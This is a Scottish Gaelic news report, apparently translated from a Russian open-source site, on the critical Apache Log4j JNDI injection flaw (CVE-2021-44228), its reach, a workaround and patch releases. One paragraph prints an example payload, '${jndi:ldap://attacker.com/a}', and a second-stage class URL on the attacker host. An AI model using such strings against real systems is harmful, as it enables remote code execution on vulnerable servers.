Ann an Apache Log4j, frèam mòr-chòrdte airson logadh a-steach ann an tagraidhean Java a chuir air dòigh, chaidh so-leòntachd èiginneach a chomharrachadh a leigeas le còd neo-riaghailteach a chuir an gnìomh nuair a thèid luach le cruth sònraichte ann an cruth “{jndi:URL}” a sgrìobhadh chun loga. Faodar an ionnsaigh a dhèanamh air tagraidhean Java a bhios a’ logadh luachan a gheibhear bho thùsan bhon taobh a-muigh, mar eisimpleir, nuair a sheallas tu luachan trioblaideach ann am teachdaireachdan mearachd.
Thathas a 'toirt fa-near gu bheil an duilgheadas a' toirt buaidh air cha mhòr a h-uile pròiseact a tha a 'cleachdadh frèaman leithid Apache Struts, Apache Solr, Apache Druid no Apache Flink, a' gabhail a-steach Steam, Apple iCloud, cliantan Minecraft agus frithealaichean. Thathas an dùil gum faodadh an so-leòntachd leantainn gu tonn de dh ’ionnsaighean mòra air tagraidhean corporra, ag ath-aithris eachdraidh so-leòntachd èiginneach ann am frèam Apache Struts, a tha, a rèir tuairmse garbh, air a chleachdadh ann an tagraidhean lìn le 65% de Fortune. 100 companaidh a’ toirt a-steach oidhirpean gus an lìonra a sganadh airson siostaman so-leònte.
Tha an duilgheadas air a dhèanamh nas miosa leis gu bheil brath obrach air fhoillseachadh mar-thà, ach cha deach fuasglaidhean airson na meuran seasmhach a chuir ri chèile fhathast. Cha deach an aithnichear CVE a shònrachadh fhathast. Chan eil an rèiteachadh air a ghabhail a-steach ach ann am meur deuchainn log4j-2.15.0-rc1. Mar dhòigh-obrach airson casg a chuir air so-leòntachd, thathas a’ moladh am paramadair log4j2.formatMsgNoLookups a shuidheachadh gu fìor.
Chaidh an duilgheadas adhbhrachadh leis gu bheil log4j a ’toirt taic do bhith a’ giullachd masgaichean sònraichte “{}” ann an toradh loidhnichean chun log, anns an gabhadh ceistean JNDI (Java Nameing and Directory Interface) a chuir gu bàs. Bidh an ionnsaigh a’ goil sìos gu bhith a’ dol seachad air sreang leis an ionad-àite “${jndi:ldap://attacker.com/a}”, nuair a thèid a ghiullachd a chuireas log4j iarrtas LDAP airson an t-slighe chun chlas Java gu frithealaiche attacker.com . Thèid an t-slighe air ais le frithealaiche an neach-ionnsaigh (mar eisimpleir, http://second-stage.attacker.com/Exploit.class) a luchdachadh agus a chuir gu bàs ann an co-theacsa a’ phròiseis làithreach, a leigeas leis an neach-ionnsaigh còd neo-riaghailteach a chuir an gnìomh air an siostam le còraichean an tagraidh làithreach.
Adendum 1: Chaidh an aithnichear CVE-2021-44228 a thoirt don so-leòntachd.
Adendum 2: Chaidh dòigh air faighinn seachad air an dìon a chaidh a chur ris le release log4j-2.15.0-rc1 a chomharrachadh. Chaidh ùrachadh ùr, log4j-2.15.0-rc2, a mholadh le dìon nas coileanta an aghaidh so-leòntachd. Tha an còd a’ soilleireachadh an atharrachaidh co-cheangailte ri dìth crìochnachadh neo-àbhaisteach a thaobh a bhith a’ cleachdadh URL JNDI ann an cruth ceàrr.
Source: fosgailtenet.ru